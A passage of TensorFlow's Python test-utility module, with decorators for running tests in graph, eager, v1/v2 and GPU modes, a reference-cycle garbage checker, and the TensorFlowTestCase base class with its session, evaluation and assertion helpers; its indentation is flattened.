cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
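For example, an illustrative sketch (the test name and its body are
hypothetical):
```python
class MyTests(tf.test.TestCase):

  @assert_no_garbage_created
  def test_no_reference_cycle(self):
    lst = [1, 2, 3]
    # A line such as `lst.append(lst)` would create a reference cycle and
    # cause this decorator to fail the test.
    self.assertEqual(3, len(lst))
```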
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
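For example, an illustrative sketch of the returned combinations:
```python
_combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
# Returns (as OrderedDicts, with keys sorted by name):
#   [{"mode": "graph", "use_gpu": True},
#    {"mode": "eager", "use_gpu": True}]
```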
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
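For example, an illustrative sketch of the generated names:
```python
generate_combinations_with_testcase_name(mode=["graph", "eager"])
# Returns (as OrderedDicts):
#   [{"mode": "graph", "testcase_name": "_test_mode_graph"},
#    {"mode": "eager", "testcase_name": "_test_mode_eager"}]
```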
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)), "".join(
filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith(
unittest.TestLoader.testMethodPrefix) and not (
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or name == "test_session"):
setattr(cls, name, base_decorator(value))
return cls
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
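For example, a minimal usage sketch (the test method and the computation are
hypothetical):
```python
class MyTests(tf.test.TestCase):

  @also_run_as_tf_function
  def test_square(self):
    x = tf.constant(3.0)
    self.assertAllClose(9.0, x * x)
```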
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
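For example, a minimal usage sketch (the test method is hypothetical; it uses
a placeholder, which only exists when building graphs):
```python
class MyTests(tf.test.TestCase):

  @deprecated_graph_mode_only
  def test_placeholder_shape(self):
    x = tf.placeholder(tf.float32, shape=[2])
    self.assertEqual([2], x.shape.as_list())
```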
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
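For example, a minimal usage sketch (the reason string and test body are
hypothetical):
```python
class MyTests(tf.test.TestCase):

  @run_v1_only("Relies on tf.Session, which is unavailable in v2.")
  def test_session_run(self):
    with self.cached_session() as sess:
      self.assertAllEqual([3], sess.run(tf.constant([3])))
```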
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
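For example, a minimal usage sketch (the test body is hypothetical):
```python
class MyTests(tf.test.TestCase):

  @run_gpu_only
  def test_gpu_math(self):
    with tf.device("/device:GPU:0"):
      x = tf.constant([1.0, 2.0])
      self.assertAllClose([2.0, 4.0], self.evaluate(x * 2.0))
```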
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
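For example, an illustrative sketch inside a test method (the compute
capability pair is just a sample value):
```python
if not tf.test.is_gpu_available(cuda_only=True,
                                min_cuda_compute_capability=(3, 5)):
  self.skipTest("Requires a CUDA GPU with compute capability >= 3.5")
```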
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders, we should be able to
call self.evaluate(); however, this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager execution with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal of completion.
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
# The description is just for documentation purposes.
def disable_all_xla(description):
def disable_all_impl(cls):
"""Execute all test methods in this class only if xla is not enabled."""
base_decorator = disable_xla
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and not name == "test_session":
setattr(cls, name, base_decorator(description)(value))
return cls
return disable_all_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
os.putenv(
"TF_XLA_FLAGS", "--tf_xla_auto_jit=2 --tf_xla_min_cluster_size=1 "
"--tf_xla_enable_lazy_compilation=false")
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This ensures that across different runs tests will not be
able to pollute each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
